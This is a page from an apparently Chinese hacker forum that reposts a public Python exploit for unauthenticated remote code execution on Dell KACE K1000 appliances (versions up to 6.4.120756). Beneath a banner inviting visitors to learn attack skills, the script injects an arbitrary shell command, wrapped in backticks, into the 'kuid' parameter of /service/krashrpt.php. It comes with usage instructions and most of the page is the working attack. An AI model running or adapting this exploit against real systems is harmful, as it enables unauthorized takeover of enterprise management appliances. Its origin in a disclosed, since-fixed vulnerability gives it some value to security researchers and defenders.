游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Unauthenticated Remote Code Execution

PHP,webapps,

发布于2022年11月8日2年前

#!/usr/bin/python
# Exploit Title: Dell KACE Systems Management Appliance (K1000) <= 6.4.120756 Unauthenticated RCE
# Version:       <= 6.4.120756
# Date:          2019-04-09
# Author:        Julien Ahrens (@MrTuxracer)
# Software Link: https://www.quest.com/products/kace-systems-management-appliance/
# Write-up:      https://www.rcesecurity.com/2019/04/dell-kace-k1000-remote-code-execution-the-story-of-bug-k1-18652/
# Note:          The software is maintained by Quest now, but the vulnerability was fixed while Quest was part of Dell.            
#
# Usage: python3 exploit.py https://localhost 'sleep 10'

import requests
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

target_url = sys.argv[1]
payload = sys.argv[2]

r = requests.post(target_url + '/service/krashrpt.php', data={
    'kuid' : '`' + payload + '`'
    }, verify=False)

print('Response: %s %s\nKACE Version: %s\nResponse time: %ss' % (r.status_code, r.reason, r.headers['X-DellKACE-Version'], r.elapsed.total_seconds()))